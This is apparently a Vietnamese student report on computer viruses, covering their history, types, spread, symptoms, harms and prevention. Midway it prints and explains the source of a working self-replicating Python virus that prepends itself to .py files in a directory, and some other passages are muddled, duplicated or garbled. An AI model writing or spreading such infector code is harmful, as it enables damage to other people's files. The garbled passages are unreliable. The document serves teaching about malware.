Vào cuối thập niên 1960 đầu thập niên 1970 đã xuất hiện trên các máy Univax 1108 1 chương trình gọi là "Pervading Animal" tự nó có thể nối với phần sau của các tập tin tự hành, lúc đó ch
Khái niệm & cách thức hoạt động
Virus máy tính hay còn thường được mọi người gọi là virus là những đoạn mã chương trình được thiết kế với mục đích nhằm xâm nhập vào máy tính người dùng từ đó lấy cắp các thông tin các nhân, xóa dữ liệu hay thậm chí là gửi email nặc danh và có thể tự nhân bản và sao chép chính nó vào các chương trình khác.
Virus máy tính là những đoạn mã chương trình được thiết kế để thực hiện tối thiểu hai việc:
1 Tự xen vào hoạt động hiện hành của máy tính một cách hợp lệ, để thực hiện tự nhân bản và những công việc theo chủ ý của lập trình viên Sau khi kết thúc thực thi mã virus thì điều khiển được trả cho trình đang thực thi mà máy không bị "treo", trừ trường hợp virus cố ý treo máy.
2 Tự sao chép chính nó, tức tự nhân bản, một cách hợp lệ lây nhiễm vào những tập tin (file) hay các vùng xác định (boot, FAT sector) ở các thiết bị lưu trữ như đĩa cứng, đĩa mềm, thiết bị nhớ flash (phổ biến là USB) thậm chí cả EPROM chính của máy.
Ban đầu, mục đích tạo ra virus để nhằm đáp ứng các công trình thử nghiệm nhưng càng về sau vì nhiều lí do trục lợi khác nhau mà virus đã trở nên nguy hiểm hơn khi chúng được sử dụng để hướng đến việc đánh cắp thông tin cá nhân người dùng, tạo cơ hội cho các tin tặc nắm quyền điều khiển hay những mục đích xấu xa khác
Các máy tính hoạt động bằng các chỉ thị (hay lệnh, instruction) ở dạng mã máy theo trình tự hợp lý để thực thi 1 công việc (task) nào đó Mã máy là dãy số nhị phân và việc lập trình (hay thảo chương) trực tiếp mã máy rất nhức đầu, nên giới điện toán thiết kế ra các ngôn ngữ lập trình (như C, C++, Java ) để người lập trình ứng dụng thảo chương bằng những ký hiệu và tên gọi dễ nhớ, sau đó dịch sang mã máy để máy thi hành Nếu lập trình không hợp lý thì máy bị treo, không làm được gì.
Kỹ thuật lập trình dẫn đến những công việc xác định được lặp lại nhiều lần thường được tổ chức thành module riêng gọi là "trình con", trong ngôn ngữ lập trình gọi là routine hay subroutine, và khi cần thực hiện công việc vốn ấn định cho routine đó thì trình đang chạy thực hiện lệnh gọi (call) đến routine đó để thực thi Lệnh call có tham số là địa chỉ routine trong bộ nhớ, khi thực thi lệnh call thì chuyển địa chỉ này vào con trỏ lệnh của CPU và trao quyền chạy cho routine đó Cấu trúc routine có điểm vào (entry) là nơi bắt đầu, và điểm ra (exit) trả lại điều khiển cho trình gọi (caller) sau khi hoàn tất công việc.
Virus được viết ra là dạng 1 routine, thực hiện sửa tham số địa chỉ của một số lệnh call trỏ đến địa chỉ của nó, và kết thúc virus thì chuyển điều khiển đến routine vốn được gọi của trình Những gì virus làm thì gói trong dãy mã lệnh virus, trong đó có kỹ năng tự sao lây nhiễm, và tùy thuộc trình độ người viết virus.
Virus tin học chỉ phát tác khi được gọi với tư cách mã lệnh Nếu nạp virus tin học với tư cách dữ liệu (data) vào bộ nhớ để xem (dump) thì nó không làm được gì cả Nó cho thấy vai trò cảnh giác khi click vào file có virus (tức là có thể view, edit, delete nhưng đừng double click).
Trong thiết kế các máy tính địa chỉ các routine cơ bản được bố trí như sau:
1 Địa chỉ các routine của máy chứa trong BIOS thì sau khởi động được đặt trong bộ nhớ ở nơi gọi là "bảng địa chỉ Interrupt".
2 Khởi động của ổ đĩa (mềm, cứng, USB ) được đặt ở boot sector, còn địa chỉ file trong ổ đĩa đặt ở bảng FAT của đĩa.
Virus lục lọi các bảng này để tìm cách thâm nhập thích hợp Trước đây các virus thường ngắn, có thể gắn thêm vào tệp mã Ngày nay virus có thể lưu trữ phần thân ở dạng file riêng và ẩn dấu đâu đó trong đĩa hoặc trên mạng, và nội dung file này có thể là dạng macro hoặc html Các hệ điều hành đã tăng cường bảo mật những điểm dễ bị tấn công Vì thế virus phải cố tìm các lỗ hổng bảo mật để xâm nhập, và việc tìm ra lỗ hổng đòi hỏi khả năng phân tích mã lệnh phức tạp hơn Một số virus thì xuất hiện ở dạng chương trình tự lập, thực chất là phần mềm phá hoại, và thực hiện đánh lừa bằng cách hiện ra là 1 biểu tượng (icon) hay đường link để người thiếu cảnh giác click vào đó.
Phân loại
1.2.1.Virus khởi động(Boot Virus)
Virus khởi động hoặc virus khu vực khởi động làm thay đổi chương trình khu vực khởi động được lưu trữ trong đĩa cứng hoặc bất kỳ thiết bị lưu trữ nào khác như đĩa mềm Nó thay thế chương trình khởi động bằng phiên bản độc hại của chính nó Nó chỉ lây nhiễm vào máy tính khi nó được sử dụng để khởi động máy tính Nếu nó xâm nhập sau quá trình khởi động, nó sẽ không lây nhiễm vào máy tính Ví dụ: nếu ai đó quên tháo đĩa mềm bị nhiễm virus khi tắt máy tính rồi bật máy tính này lên, nó sẽ chạy chương trình boot Sector bị nhiễm virus trong quá trình khởi động.
Thông thường, nó xâm nhập vào hệ thống của bạn thông qua các tệp phương tiện bị hỏng, thiết bị lưu trữ bị nhiễm độc và mạng máy tính không an toàn Ngày
3 nay, sự lây lan của loại vi-rút này rất hiếm do việc sử dụng đĩa mềm và việc sử dụng các biện pháp bảo vệ khu vực khởi động trong các hệ điều hành ngày nay đã giảm sút.
1.2.2.Ghi đè virus(Overwrite Virus) Đúng như tên gọi, loại virus này gắn mã độc của nó vào cuối tệp chương trình máy chủ Sau đó, nó thay đổi tiêu đề của tệp theo cách mà tiêu đề của tệp được chuyển hướng đến phần đầu của mã độc của virus bổ sung Do đó, mã này được thực thi mỗi khi chương trình chạy Tuy nhiên, nó không phá hủy chương trình chủ; đúng hơn, nó sửa đổi nó theo cách giữ mã vi-rút và cho phép mã tự chạy.
1.2.3.Virus vĩ mô(Macro Virus)
Virus macro thay đổi hoặc lây nhiễm macro của tài liệu hoặc tệp dữ liệu Nó được nhúng dưới dạng macro trong tài liệu và thêm mã của nó vào macro của tài liệu Virus lây lan khi các tài liệu hoặc tệp dữ liệu bị nhiễm được mở trên các máy tính khác.
Nó cũng lây lan qua các chương trình phần mềm thực thi macro như Ms Word,
Ms Excel Mỗi khi một tài liệu được mở bằng các chương trình này, các tài liệu liên quan khác cũng sẽ bị lây nhiễm.
1.2.4.Nối thêm virus(Append Virus) Đúng như tên gọi, loại virus này gắn mã độc của nó vào cuối tệp chương trình máy chủ Sau đó, nó thay đổi tiêu đề của tệp theo cách mà tiêu đề của tệp được chuyển hướng đến phần đầu của mã độc của virus bổ sung Do đó, mã này được thực thi mỗi khi chương trình chạy Tuy nhiên, nó không phá hủy chương
4 trình chủ; đúng hơn, nó sửa đổi nó theo cách giữ mã vi-rút và cho phép mã tự chạy.
1.2.5.Virus thường trú(Resident Virus)
Virus thường trú tồn tại vĩnh viễn trong bộ nhớ chính (RAM) của máy tính Khi bạn khởi động máy tính, nó sẽ hoạt động và làm hỏng các tệp và chương trình đang chạy trên máy tính.
1.2.6.Virus đa nhân(Multipartite Virus)
Virus Multipartite lây lan và lây nhiễm theo nhiều cách Nó lây nhiễm đồng thời cả khu vực khởi động và các tệp thực thi được lưu trữ trên ổ cứng Khi bạn bật máy tính, vi-rút khu vực khởi động sẽ được kích hoạt khi nó bám vào ổ cứng chứa dữ liệu để khởi động máy tính Một khi nó được kích hoạt, các tập tin chương trình cũng bị lây nhiễm.
1.2.7.Virus lây nhiễm tập tin(File Infector Virus) Đây là một trong những loại virus máy tính phổ biến nhất Nó chủ yếu lây nhiễm vào các tập tin thực thi; các tệp có phần mở rộng com hoặc exe Virus sẽ hoạt động khi tệp bị nhiễm được thực thi Virus đang hoạt động ghi đè lên tệp một phần hoặc toàn bộ Vì vậy nó có thể phá hủy một phần hoặc toàn bộ tập tin gốc.
1.2.8.Sâu máy tính(Computer Worm)
Sâu máy tính tương tự như virus nhưng về mặt kỹ thuật thì khác với virus Nó có thể nhân lên và lây lan như virus, nhưng không giống như virus, nó không cần chương trình máy chủ để lây lan Có khả năng tự sao chép, nó có thể tạo ra nhiều bản sao của chính nó Nó lây lan qua các mạng chẳng hạn như một
5 email được gửi đến một id email bị nhiễm có thể lây nhiễm sâu máy tính vào hệ thống của bạn.
1.2.9.Con ngựa thành Troy(Trojan Horse)
Trojan horse là một phần mềm độc hại giống như virus hoặc sâu, nhưng về mặt kỹ thuật thì nó khác với cả hai loại này Nó không thể nhân bản như virus và sâu Con ngựa thành Troy ẩn mình trong một chương trình Khi bạn cài đặt bất kỳ chương trình nào như vậy, trojan sẽ xâm nhập vào máy tính của bạn Nó có thể cung cấp quyền truy cập trái phép vào máy tính của bạn, gửi tệp của bạn đến máy tính khác và có thể xóa tệp hoặc có thể thực hiện các thay đổi không mong muốn khác trong máy tính của bạn.
Nó còn được gọi là virus Spacefiller Đúng như tên gọi, loại virus này có xu hướng tự cài đặt bằng cách chiếm giữ các phần trống của tệp Không dễ để phát hiện loại vi-rút này vì nó lấp đầy các khoảng trống mà không làm thay đổi kích thước của tệp.
Nó lây nhiễm vào CMOS, viết tắt của chất bán dẫn oxit kim loại bổ sung và là chip bộ nhớ chứa cấu hình hệ thống Virus này có thể xóa hoặc thiết lập lại cấu hình hệ thống.
1.2.12.Virus đồng hành(Companion Virus)
Nó nằm trong một tệp có tên giống với tệp chương trình khác, được thực thi bình thường Khi tệp chương trình được thực thi, vi-rút sẽ được kích hoạt và thực hiện các bước độc hại như xóa các tệp trên ổ cứng máy tính của bạn.
1.2.13.Virus được mã hóa(Encrypted Virus)
Nó mã hóa tải trọng của nó để làm cho việc phát hiện nó khó khăn hơn Nó bao gồm hai phần: phần thân virus được mã hóa và bộ giải mã, giải mã virus khi nó được thực thi Sau khi giải mã, virus có thể tự thực thi để nhân lên và trở thành cư dân Hơn nữa, nó khác với cryptolocker, một loại virus máy tính mã hóa dữ liệu ổ cứng và giữ nó để đòi tiền chuộc.
1.2.14.Virus thực thi(Executable Virus)
Cách thức virus thâm nhập vào thiết bị
2.1.1 Virus lây nhiễm theo cách cổ điển
Cách cổ điển nhất của sự lây nhiễm, bành trướng của các loai virus máy tính là thông qua các thiết bị lưu trữ di động: Trước đây đĩa mềm và đĩa CD chứa chương trình thường là phương tiện bị lợi dụng nhiều nhất để phát tán Ngày nay khi đĩa mềm rất ít được sử dụng thì phương thức lây nhiễm này chuyển qua các ổ
USB, các đĩa cứng di động hoặc các thiết bị giải trí kỹ thuật số.
2.1.2.Virus lây nhiễm qua thư điện tử
Khi mà thư điện tử (email) được sử dụng rộng rãi trên thế giới thì virus chuyển hướng sang lây nhiễm thông qua thư điện tử thay cho các cách lây nhiễm truyền thống.
Khi đã lây nhiễm vào máy nạn nhân, virus có thể tự tìm ra danh sách các địa chỉ thư điện tử sẵn có trong máy và nó tự động gửi đi hàng loạt (mass mail) cho những địa chỉ tìm thấy Nếu các chủ nhân của các máy nhận được thư bị nhiễm virus mà không bị phát hiện, tiếp tục để lây nhiễm vào máy, virus lại tiếp tục tìm đến các địa chỉ và gửi tiếp theo Chính vì vậy số lượng phát tán có thể tăng theo cấp số nhân khiến cho trong 1 thời gian ngắn hàng hàng triệu máy tính bị lây nhiễm, có thể làm tê liệt nhiều cơ quan trên toàn thế giới trong 1 thời gian rất ngắn.
Khi mà các phần mềm quản lý thư điện tử kết hợp với các phần mềm diệt virus có thể khắc phục hành động tự gửi nhân bản hàng loạt để phát tán đến các địa chỉ khác trong danh bạ của máy nạn nhân thì chủ nhân phát tán virus chuyển qua hình thức tự gửi thư phát tán virus bằng nguồn địa chỉ sưu tập được trước đó.
Phương thức lây nhiễm qua thư điển tử bao gồm:
Lây nhiễm vào các file đính kèm theo thư điện tử (attached mail).
Khi đó người dùng sẽ không bị nhiễm virus cho tới khi file đính kèm bị nhiễm virus được kích hoạt (do đặc điểm này các virus thường được "trá hình" bởi các tiêu đề hấp dẫn như sex, thể thao hay quảng cáo bán phần mềm với giá vô cùng rẻ).
Lây nhiễm do mở 1 liên kết trong thư điện tử Các liên kết trong thư điện tử có thể dẫn đến 1 trang web được cài sẵn virus, cách này thường khai thác các lỗ hổng của trình duyệt và hệ điều hành một cách khác, liên kết dẫn tới việc thực thi 1 đoạn mã, và máy tính bị có thể bị lây nhiễm virus.
Lây nhiễm ngay khi mở để xem thư điện tử: Cách này vô cùng nguy hiểm bởi chưa cần kích hoạt các file hoặc mở các liên kết, máy tính đã có thể bị lây nhiễm virus Cách này thường khai thác các lỗi của hệ điều hành.
2.1.3 Virus lây nhiễm qua mạng Internet
Có các hình thức lây nhiễm virus và phần mềm độc hại thông qua Internet như sau:
Lây nhiễm thông qua các file tài liệu, phần mềm: Là cách lây nhiễm cổ điển, nhưng thay thế các hình thức truyền file theo cách cổ điển (đĩa mềm, đĩa USB ) bằng cách tải từ Internet, trao đổi, thông qua các phần mềm
Lây nhiễm khi đang truy cập các trang web được cài đặt virus (theo cách vô tình hoặc cố ý): Các trang web có thể có chứa các mã hiểm độc gây lây nhiễm virus và phần mềm độc hại vào máy tính của người sử dụng khi truy cập vào các trang web đó.
Lây nhiễm virus hoặc chiếm quyền điều khiển máy tính thông qua các lỗi bảo mật hệ điều hành, ứng dụng sẵn có trên hệ điều hành hoặc phần mềm của hãng thứ ba: Điều này có thể khó tin đối với một số người sử dụng, tuy nhiên tin tặc có thể lợi dụng các lỗi bảo mật của hệ điều hành, phần mềm sẵn có trên hệ điều hành (ví dụ Windows Media Player) hoặc lỗi bảo mật của các phần mềm của hãng thứ ba (ví dụ AcrobatReader) để lây nhiễm virus hoặc chiếm quyền kiểm soát máy tính nạn nhân khi mở các file liên kết với các phần mềm này.
Dấu hiệu nhận biết virus máy tính
Hiệu suất máy tính chậm: Máy có thể hoạt động chậm, ví dụ: sẽ mất nhiều thời gian hơn để mở hoặc tắt máy tính hoặc khi mở một tập tin, tài liệu, ứng dụng máy tính, v.v Hệ điều hành và tốc độ internet có thể bị chậm.
Cửa sổ bật lên thường xuyên: Vi-rút có thể gây ra các cửa sổ bật lên thường xuyên bất thường trên cửa sổ của bạn.
Sự cố ổ cứng: Ổ cứng có thể hoạt động cao bất thường ngay cả khi không sử dụng Nó có thể gây ra những thay đổi không mong muốn đối với ổ cứng của bạn và có thể đóng băng hoặc làm hỏng thiết bị này.
Sự cố thường xuyên: Người ta có thể thường xuyên gặp sự cố hệ thống đột ngột khi chơi trò chơi, xem video hoặc thực hiện một số công việc khác bằng hệ thống bị nhiễm Màn hình xanh xuất hiện khi nó bị treo.
Chương trình không xác định: Các chương trình không mong muốn có thể tự động mở hoặc khởi động khi bạn khởi động máy tính Bạn có thể xem các chương trình này trong danh sách ứng dụng đang hoạt động trên máy tính của bạn Đôi khi, cửa sổ tắt đột ngột mà không rõ lý do.
Hoạt động bất thường: Máy của bạn có thể hoạt động khác đi, chẳng hạn như bạn không thể đăng nhập vào tài khoản của mình, xóa các tệp bị hỏng và Màn hình xanh chết chóc (BSOD) có thể xuất hiện thường xuyên, v.v.
Hơn nữa, phần cứng, phần mềm hoặc hệ điều hành có thể bắt đầu gặp trục trặc dẫn đến hệ thống bị treo đột ngột.
Giải pháp bảo mật bị suy giảm: Đôi khi, các biện pháp bảo mật mà bạn thực hiện, chẳng hạn như phần mềm chống vi-rút có thể không hoạt động trơn tru do vi-rút tấn công vào máy tính của bạn.
Sự cố mạng: Đôi khi, bạn gặp phải tình trạng hoạt động mạng cao ngay cả khi bạn không kết nối với Internet và ngược lại.
Quảng cáo không cần thiết: Chúng ta thường thấy quảng cáo khi duyệt web, nhưng nếu bạn nhìn thấy chúng ngay cả khi không duyệt web thì có thể máy tính của bạn có vi-rút.
Sự cố hiển thị: Bạn có thể gặp các màu khác nhau trên màn hình nếu máy tính của bạn bị ảnh hưởng bởi vi-rút. Ứng dụng bị ảnh hưởng: Một số vi-rút được phát triển để ảnh hưởng đến các ứng dụng cụ thể Do đó, một số ứng dụng có thể không hoạt động trên máy tính của bạn nếu bị nhiễm virus.
Bị chặn bởi các trang web chống vi-rút: Một trang web chống vi-rút có thể từ chối quyền truy cập vào máy tính bị nhiễm vi-rút.
Hộp thoại: Nhiều hộp thoại liên tục xuất hiện đột ngột trên màn hình của bạn.
Sự cố máy in: Máy in được gắn vào máy tính bị nhiễm có thể in tài liệu mà không nhận được bất kỳ lệnh nào hoặc theo cách không phù hợp.
Trang chủ đã thay đổi: Trang chủ của bạn có thể được thay đổi mà không cần bất kỳ nỗ lực nào từ phía bạn Ví dụ: bạn có thể thấy một thanh công cụ mới trên màn hình của mình và bạn có thể được chuyển hướng đến một địa chỉ web khác thay vì trang mà bạn đã truy cập ban đầu.
Thông báo lạ: Người ta có thể thấy các thông báo lạ trên màn hình máy tính, chẳng hạn như thông báo lỗi, ví dụ: "không thể đổi tên "thư mục" vì một thư mục đã tồn tại với tên này"
Cấu tạo của virus
Thông thường, một virus máy tính được cấu tạo gồm ba phần:
1.Vector lây nhiễm: phần này có nhiệm vụ tìm mục tiêu và truyền đến mục tiêu này
2.Trình kích hoạt: đây là điều kiện khi đáp ứng sẽ thực thi tải trọng
3.Tải trọng: chức năng độc hại mà virus mang theo try:
# retrieve the virus code from the current infected script virus_code get_virus_code() # look for other files to infect for file find_files_to_infect():in infect(file, virus_code)
# call the payload summon_chaos()
# delete used names from memory for in i list(globals().keys()):
(i[0] '_'):if ! exec('del {}'.format(i)) del i
Trước hết, chúng ta gọi get_virus_code()hàm, hàm này trả về mã nguồn của virus được lấy từ tập lệnh hiện tại.
Sau đó, find_files_to_infect()hàm sẽ trả về danh sách các file có thể bị lây nhiễm và với mỗi file được trả về, virus sẽ lây lan sự lây nhiễm.
Sau khi quá trình lây nhiễm diễn ra, chúng tôi chỉ gọi summon_chaos()hàm này, tức là - như tên của nó gợi ý - hàm tải trọng với mã phần mềm độc hại. mọi thứ đã được chèn vào một try-exceptkhối, để đảm bảo rằng các ngoại lệ trên mã vi-rút của chúng ta bị mắc kẹt và bỏ qua bởi passcâu lệnh trong exceptkhối.
Khối này finallylà phần cuối cùng của vi-rút và mục tiêu của nó là xóa các tên đã sử dụng khỏi bộ nhớ để đảm bảo không ảnh hưởng đến cách hoạt động của tập lệnh bị nhiễm.
13 import glob def find_files_to_infect(directory = "."): return [file for file glob.glob("*.py")]in def get_content_of_file(file): data None with open(file, "r") my_file:as data my_file.readlines() return data def get_content_if_infectable(file): data get_content_of_file(file) for line data:in
"# begin-virus" line:if in return None return data def infect(file, virus_code):
(data:if =get_content_if_infectable(file)): with open(file, "w") infected_file:as infected_file.write("".join(virus_code)) infected_file.writelines(data) def get_virus_code():
14 virus_code_on False virus_code [] code get_content_of_file( file ) for line code:in
"# begin-virus\n" line:if in virus_code_on True virus_code_on:if virus_code.append(line)
"# end-virus\n" line:if in virus_code_on False break return virus_code def summon_chaos():
# the virus payload print("We are sick, fucked up and complicated\nWe are chaos, we can't be cured")
# retrieve the virus code from the current infected script
15 virus_code get_virus_code() # look for other files to infect for file find_files_to_infect():in infect(file, virus_code)
# call the payload summon_chaos()
# delete used names from memory for in i list(globals().keys()):
(i[0] '_'):if ! exec('del {}'.format(i)) del i
2.4 1000 Mã Nguồn Virus Máy Tính Dùng Cho Nghiên Cứu
Ưu điểm và nhược điểm của virus máy tính
3.1.1 Ưu điểm Để kiếm tiền và được nhiều người biết đến hơn, nhiều lập trình viên đã dành cả sự nghiệp của mình để tạo ra virus và các biện pháp đối phó.
Nếu hệ thống bị nhiễm virus nghiêm trọng, bạn cũng có thể phải trả tiền cho chuyên gia PC để định dạng lại nó.
Nhiều tổ chức tài chính và giáo dục sử dụng virus để ngăn chặn tin tặc và máy quét trực tuyến.
Các chương trình nền làm chậm tốc độ của máy tính Hiệu suất giảm sút là điều không thể tránh khỏi vì virus được thiết kế để hoạt động ở chế độ nền và thực hiện một số tác vụ Bạn có thể bị nhiễm vi-rút nếu máy Mac của bạn mất nhiều thời gian để khởi động hoặc truy cập ứng dụng.
Vi-rút có thể thay đổi hệ thống máy tính của bạn sau khi lây nhiễm, cho phép bạn truy cập các tính năng mà trước đây bạn không thể.
Ngay cả khi bây giờ bạn đã cài đặt phần mềm chống vi-rút, hoàn toàn có khả năng bạn sẽ không thể làm được điều đó trong tương lai.
Virus có thể sẽ khiến bất kỳ chương trình nào không thể tìm ra và loại bỏ vấn đề mà nó gây ra Những người thiết kế virus không muốn bạn có thể loại bỏ nó.
Sự tham nhũng của phần mềm và trình điều khiển.
Nó gây ra căng thẳng cho máy tính.
Tác hại
Làm chậm tốc độ máy tính: Bất kỳ một ứng dụng, phần mềm nào mỗi khi hoạt động trên máy tính, laptop đều sẽ chiếm dụng một phần năng lực xử lý của CPU hay cả hệ thống Virus cũng hoạt động dựa trên cơ chế đó, thậm chí từ một con virus ban đầu, nó có thể nhân bản lên nhiều lần, xâm nhập vào hệ thống, chiếm dụng tài nguyên và còn có thể là tê liệt hệ thống máy tính Những thiết bị máy tính, laptop bị nhiễm virus đa phần đều sẽ hoạt động chậm đi so với tốc độ ban đầu.
Tác động đến các ứng dụng: Một số loại virus khi xâm nhập vào máy tính sẽ bắt đầu gây hại mà dễ thấy nhất là chúng có thể tác động đến các ứng dụng, phần mềm trên máy Mỗi chúng ta đều có những thói quen khi sử dụng các phần mềm, tuy nhiên việc bị virus ảnh hưởng có thể làm thay đổi, xáo trộn thói quen cũ của chúng ta Cụ thể, chúng có thể gây ra một số thay đổi trên giao diện khi thao tác Mặt khác, một số virus tạo ra tình trạng các cửa số quảng cáo pop-up liên tục được bật lên làm người dùng khó chịu. Ảnh hưởng dữ liệu cá nhân: Máy tính là vật dụng lưu trữ nhiều thông tin, có thể là thông tin cá nhân của người sử dụng, nếu là máy tính của doanh nghiệp thì còn có thể chứa những dữ liệu phục vụ công việc, bí mật kinh doanh Do đó, một trong những tác hại của virus máy tính được cảnh báo nhất đó là tình trạng “ăn” dữ liệu Có thể hiểu là tình trạng virus sẽ tấn công và xóa đi hoặc vô hiệu hóa các tệp tin, dữ liệu trong máy Điều này có ảnh hưởng rất lớn đến công việc và học tập của người dùng Bên cạnh đó, một tác hại của virus máy tính khác có thể kể đến những tin tặc sẽ sử dụng virus xâm nhập vào máy và lấy đi những thông tin quan trọng được lưu trữ trong đó như: tài khoản ngân hàng mật khẩu, các thông tin riêng, tư và thậm chí có thể nhạy cảm Từ đó, chúng sẽ thực hiện các hành vi phạm pháp, ảnh hưởng đến lợi ích cá nhân của người bị lấy thông tin.
Máy bị treo không thể khởi động : Ngoài những tác hại của virus máy tính về mặt dữ liệu, một tác hại khác về phần cứng bạn cũng có thể gặp phải nếu máy bị nhiễm virus đó là vô hiệu hóa máy tính Mặc dù không phải loại virus nào cũng được tạo ra với chức năng này, tuy nhiên chúng vẫn rất nguy hiểm.Với khả năng vô hiệu hóa hoặc khóa máy tính, người dùng có thể phải trả một khoản phí lớn để máy có thể sử dụng được trở lại Một số virus khác thì được thiết lập để tấn công vào các file hệ thống làm cho máy không hoạt động bình thường được, thậm chí có thể bị treo.
Cách ngăn chăn phòng chống virus tấn công
Để không bị lây nhiễm virus thì giải pháp triệt để nhất là ngăn chặn mọi kết nối thông tin vào thiết bị máy tính bao gồm ngắt kết nối mạng chia sẻ, không sử dụng ổ mềm, ổ USB hoặc copy bất kỳ file nào vào máy tính, đặc biệt các dạng file có nguy cơ cao Điều này thực sự hiệu quả khi mà hiện nay sự tăng trưởng số lượng virus mới hàng năm trên thế giới rất lớn.
Tuy nhiên, trong thời đại "bùng nổ thông tin", đa số mọi người đều có nhu cầu truy cập vào "không gian số", không thể khẳng định chắc chắn bảo vệ an toàn
100% cho máy tính trước hiểm hoạ virus và các phần mềm không mong muốn, nhưng chúng ta có thể hạn chế đến tối đa với các biện pháp bảo vệ dữ liệu của mình:
3.3.1 Sử dụng phần mềm diệt virus
Bảo vệ bằng cách trang bị thêm một phần mềm diệt virus có khả năng nhận biết nhiều loại virus máy tính và liên tục cập nhật dữ liệu để phần mềm đó luôn nhận biết được các virus mới.
Trên thị trường Việt Nam hiện có rất nhiều các tên tuổi phần mềm diệt virus như:
Do người Việt Nam viết: Bkav , D32 , CMC
Của nước ngoài: Norton-Symantec , Kaspersky , Avira
, AVG , ESET , Avast , BitDefender … Phát hành bởi Microsoft: Microsoft Security Essentials, Windows Defender (từ Windows 7 trở đi) …
3.3.2 Sử dụng tường lửa cá nhân
Tường lửa cá nhân (Personal Firewall) không phải một cái gì đó quá xa vời hoặc chỉ dành cho các nhà cung cấp dịch vụ Internet (ISP) mà mỗi máy tính cá nhân cũng cần phải sử dụng tường lửa để bảo vệ trước virus và các phần mềm độc hại Khi sử dụng tường lửa, các thông tin vào và ra đối với máy tính được kiểm soát một cách vô thức hoặc có chủ ý Nếu 1 phần mềm độc hại đã được cài vào máy tính có hành động kết nối ra Internet thì tường lửa có thể cảnh báo giúp người sử dụng loại bỏ hoặc vô hiệu hoá chúng Tường lửa giúp ngăn chặn các kết nối đến không mong muốn để giảm nguy cơ bị kiểm soát máy tính ngoài ý muốn hoặc cài đặt vào các chương trình độc hại hay virus máy tính.
Tường lửa được chia hai loại:
Sử dụng tường lửa bằng phần cứng: Nếu người sử dụng kết nối với mạng Internet thông qua 1 modem hoặc 1 card chuyên dụng có chức năng này Thông thường ở chế độ mặc định của nhà sản xuất thì chức năng "tường lửa" bị tắt, người sử dụng có thể truy cập vào modem để cho phép hiệu lực (bật) Sử dụng tường lửa bằng phần cứng không phải tuyệt đối an toàn bởi chúng thường chỉ ngăn chặn kết nối đến trái phép, do đó kết hợp sử dụng tường lửa bằng các phần mềm.
Sử dụng tường lửa bằng phần mềm: Ngay các hệ điều hành họ Windows ngày nay đã được tích hợp sẵn tính năng tường lửa bằng
20 phần mềm, tuy nhiên thông thường các phần mềm của hãng thứ ba có thể làm việc tốt hơn và tích hợp nhiều công cụ hơn so với tường lửa phần mềm sẵn có của Windows Ví dụ bộ phần mềm ZoneAlarm Security Suite của hãng ZoneLab là 1 bộ công cụ bảo vệ hữu hiệu trước virus, các phần mềm độc hại, chống spam, và tường lửa.
3.3.3 Cập nhật các bản vá lỗi của hệ điều hành
Hệ điều hành Windows (chiếm đa số) luôn luôn bị phát hiện các lỗi bảo mật chính bởi sự thông dụng của nó, tin tặc có thể lợi dụng các lỗi bảo mật để chiếm quyền điều khiển hoặc phát tán virus và các phần mềm độc hại Người sử dụng luôn cần cập nhật các bản vá lỗi của Windows thông qua trang web
Microsoft Update (cho việc nâng cấp tất cả các phần mềm của hãng Microsoft) hoặc Windows Update (chỉ cập nhật riêng cho Windows) Cách tốt nhất hãy đặt chế độ nâng cấp (sửa chữa) tự động (Automatic Updates) của Windows Tính năng này chỉ hỗ trợ đối với các bản Windows mà Microsoft nhận thấy rằng chúng hợp pháp.
3.3.4 Bảo vệ dữ liệu máy tính
Nếu như không chắc chắn 100% rằng có thể không bị lây nhiễm virus máy tính và các phần mềm hiểm độc khác thì bạn nên tự bảo vệ sự toàn vẹn của dữ liệu của mình trước khi dữ liệu bị hư hỏng do virus (hoặc ngay cả các nguy cơ tiềm tàng khác như sự hư hỏng của các thiết bị lưu trữ dữ liệu của máy tính).
Trong phạm vi về bài viết về virus máy tính, bạn có thể tham khảo các ý tưởng chính như sau:
Sao lưu dữ liệu theo chu kỳ là biện pháp đúng đắn nhất hiện nay để bảo vệ dữ liệu Bạn có thể thường xuyên sao lưu dữ liệu theo chu kỳ đến một nơi an toàn như: các thiết bị nhớ mở rộng (ổ USB, ổ cứng di động, ghi ra đĩa quang ), hình thức này có thể thực hiện theo chu
21 kỳ hàng tuần hoặc khác hơn tuỳ theo mức độ cập nhật, thay đổi của dữ liệu của bạn.
Tạo các dữ liệu phục hồi cho toàn hệ thống không dừng lại các tiện ích sẵn có của hệ điều hành (ví dụ System Restore của Windows
Me, Windows XP ) mà có thể cần đến các phần mềm của hãng thứ ba, ví dụ bạn có thể tạo các bản sao lưu hệ thống bằng các phần mềm ghost, các phần mềm tạo ảnh ổ đĩa hoặc phân vùng khác.
3.3.5 Vận dụng kinh nghiệm sử dụng máy tính
Cho dù sử dụng tất cả các phần mềm và phương thức trên nhưng máy tính vẫn có khả năng bị lây nhiễm virus và các phần mềm độc hại bởi mẫu virus mới chưa được cập nhật kịp thời đối với phần mềm diệt virus Người sử dụng máy tính cần sử dụng triệt để các chức năng, ứng dụng sẵn có trong hệ điều hành và các kinh nghiệm khác để bảo vệ cho hệ điều hành và dữ liệu của mình Một số kinh nghiệm tham khảo như sau:
Phát hiện sự hoạt động khác thường của máy tính: Đa phần người sử dụng máy tính không có thói quen cài đặt, gỡ bỏ phần mềm hoặc thường xuyên làm hệ điều hành thay đổi - có nghĩa là 1 sự sử dụng ổn định - sẽ nhận biết được sự thay đổi khác thường của máy tính.
Ví dụ đơn giản: Nhận thấy sự hoạt động chậm chạp của máy tính, nhận thấy các kết nối ra ngoài khác thường thông qua tường lửa của hệ điều hành hoặc của hãng thứ ba (thông qua các thông báo hỏi sự cho phép truy cập ra ngoài hoặc sự hoạt động khác của tường lửa).
Danh sách các đuôi tệp có khả năng di truyền và bị lây nhiễm
Các tập tin trên hệ điều hành Windows mang đuôi mở rộng sau có nhiều khả năng bị virus tấn công:
.bat: Microsoft Batch File (Tệp xử lý theo lô nhiều câu lệnh) chm: Compressed HTML Help File (Tệp tài liệu dưới dạng nén HTML)
.cmd: Command file for Windows NT (Tệp thực thi của Windows NT)
.com: Command file (program) (Tệp thực thi) cpl: Control Panel extension (Tệp của Control Panel) doc: Microsoft Word (Tệp của chương trình Microsoft Word) exe: Executable File (Tệp thực thi)
.hlp: Help file (Tệp nội dung trợ giúp người dùng) hta: HTML Application (Ứng dụng HTML) js: JavaScript File (Tệp JavaScript) jse: JavaScript Encoded Script File (Tệp mã hoá JavaScript) lnk: Shortcut File (Tệp đường dẫn)
